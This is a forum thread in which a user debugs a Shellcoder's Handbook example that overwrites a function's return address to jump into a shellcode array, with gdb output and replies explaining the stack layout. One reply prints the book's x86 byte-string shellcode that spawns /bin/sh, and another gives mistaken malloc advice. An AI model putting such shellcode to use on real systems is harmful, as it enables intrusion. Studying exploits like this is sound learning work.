• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 489
  • Last Modified:

q about char code[] cast as (int)code conversion

HI c area gys and gals.,
following is code from the shellcoder's handbook page 23.  It segfaults, and when debugging i run across an incomprehensible value for (int)shellcode.

char shellcode[] = "0001";
int main() {
  int *ret;
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}

AS shown in the debugging cut/paste here:

(gdb) p shellcode
$1 = "0001"
(gdb) p &shellcode
$2 = (char (*)[5]) 0x8049534
(gdb) p (char *)shellcode
$3 = 0x8049534 "0001"
(gdb) p (int)shellcode
$4 = 134518068

$4 is different from the hex value 0x8049534 and sizeof char on RHFC2 is 4, so i thought it would print "1" because char shellcode[] = "0001".  Why doesn't it?
0
joesp
Asked:
joesp
1 Solution
 
tzxie2000Commented:
134518068 is exact 0x8049534
(int)shellcode will print the address of shellcode
it not mean parse a string shellcode to int value
so it would not be 1

if you told use about what about this code want to told you in example,it may help us to explain it
0
 
joespAuthor Commented:
uh, yes, i was wrong about the conversion -- i finally found a hextodec in converter.java and it is an int conversion of the address 0x8.....
what does it do?
they are adding 2 to the address of the first variable on the stack to overwrite its RET value (I think the stack is

RET
EBP
shellcode

so &shellcode+2 == &RET
(gdb) p &ret
$1 = (int **) 0xfeefdb64
(gdb) info registers
eax            0x0      0
ecx            0xfeefdbfc       -17835012
edx            0xfeefdbf4       -17835020
ebx            0x552ffc 5582844
esp            0xfeefdb60       0xfeefdb60
ebp            0xfeefdb68       0xfeefdb68
esi            0x1      1
edi            0x5550fc 5591292
eip            0x804834c        0x804834c

so &ret is between ebp and esp

in gdb, &ret+1 == ebp
If i use &ret+1 instead of &ret+2 it doesn't segfault.  Does anybody know the purpose, though, of casting to "int"?
0
 
smpoojaryCommented:
char shellcode[] = "0001";
int main() {
  int *ret;
// Here memory allocation statement for ret is missed.
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}

In the above code you didn't initialize memory for ret. For initializing memory, use malloc() or calloc(). That's why segmentation fault is coming. Means you can't use &ret + 2. First you have to initialize for ret [ret = (int*)malloc(5*sizeof(int));] then you can write ret = ret + 2; (*ret)=(int)shellcode;

-Mahesh
0
Easily manage email signatures in Office 365

Managing email signatures in Office 365 can be a challenging task if you don't have the right tool. CodeTwo Email Signatures for Office 365 will help you implement a unified email signature look, no matter what email client is used by users. Test it for free!

 
tzxie2000Commented:
I think you may make clear about the bytes of ebp .... in your computer and system
0
 
PaulCaswellCommented:
Its a stack hack!

>>ret = (int *)&ret + 2;

is taking the address of the only variable on the stack and adding 2 to it. It is therefore assuming that the return opcode is next on the stack, it is 2 bytes in length and there is an important address following it. Its then trying to hack that address to contain some stupid value of the address of a string in data space.

It WILL go bang on almost every system other than the one it was crafted for.

Paul
0
 
joespAuthor Commented:
but my post@ 8:43 shows
------------------
(gdb) p &ret
$1 = (int **) 0xfeefdb64
------------------
it has an address on the stack.  Maybe what you mean is -- it's not initialized, so the place it points hasn't been initialized yet, or no space has been allocated on the heap .. but this is all just stack address manipulation.

ebp in x86 points to the beginning of the   stack, like esp points to the current location of the stack pointer
0
 
tzxie2000Commented:
ret real not point to an alloc memory part
the program surely want to attach some part in stack that normally can not access by the variant in the function
I think it may be the return value of main
but it is straight for
(*ret) = (int)shellcode;
so may be you should read carefully about what this example the book want to told you
if you still unknow the means please post the book reference part of the example and let's discuss about it
0
 
joespAuthor Commented:
i may have to figure out on my own why it's not working.  The book example he gives segfaults, unless i only add 1 to &ret ... which doesn't run the shellcode, so i will have to research this one.  This problem runs deeper than i thought ... originally, i just wanted to know why it cast to an int.  I'm still open for that answer, BTW
0
 
joespAuthor Commented:
source

http://www.sirfsup.com/languages/assembler/koziol/Chapter_02/Shellcoders02sampleprogram05.c

it should do this>:

$gcc shellcode.c -o shellcode
$./shellcode
#

as he explains, the shellcode is the objdump of exe code to create shell
0
 
tzxie2000Commented:
Oh, I see

I think it may want to assign the return position in the stack

like a little different code

char shellcode[] = "0001";
int main() {
  int i;
  f();
  i=1;
}
int f() {
  int *ret;
// Here memory allocation statement for ret is missed.
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}

normally the return address will be the code site at i=1; but after

  int *ret;
// Here memory allocation statement for ret is missed.
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;

the book want to assign the return address to a data segment and when the function f //so to main return it will access a data segment and lead to seg fault
0
 
joespAuthor Commented:
does this book example work for anybody else?  You can download that source from that same page by clicking "any_browser_source.txt" or if you are using MSIE you need click "msie.txt"
0
 
joespAuthor Commented:
txzie2000

you are on the right track ... it is overwriting the return address of RET by replacing that value (which points to an address) with the address not of (wherever the hell "main" returns to after it exits) but with the address of shellcode which (magically) (magic helped by the fact that it's an object dump?) executes (itself?) then after main returns ... i am not conviced it is segfaulting because it is trying to access code from the data section .... once the program exits .... the code in the data section is returned to the system, and just be any old addressable address, no?
0
 
tzxie2000Commented:
yes I test the code

I think may be the shellcode assigne by the book
char shellcode[] =    
 "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
 "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
 "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

is more special and contain some code in the system

I test the code and my system crashed
   
0
 
joespAuthor Commented:
tzxie2000 thank you for your time.  I am sorry we couldn't resolve this.  it is only the second chapter, i will post here when i find the answer later in the book .... i don't have the time at the moment.
0
 
tzxie2000Commented:
you're welcome
0

Featured Post

Has Powershell sent you back into the Stone Age?

If managing Active Directory using Windows Powershell® is making you feel like you stepped back in time, you are not alone.  For nearly 20 years, AD admins around the world have used one tool for day-to-day AD management: Hyena. Discover why.

Tackle projects and never again get stuck behind a technical roadblock.
Join Now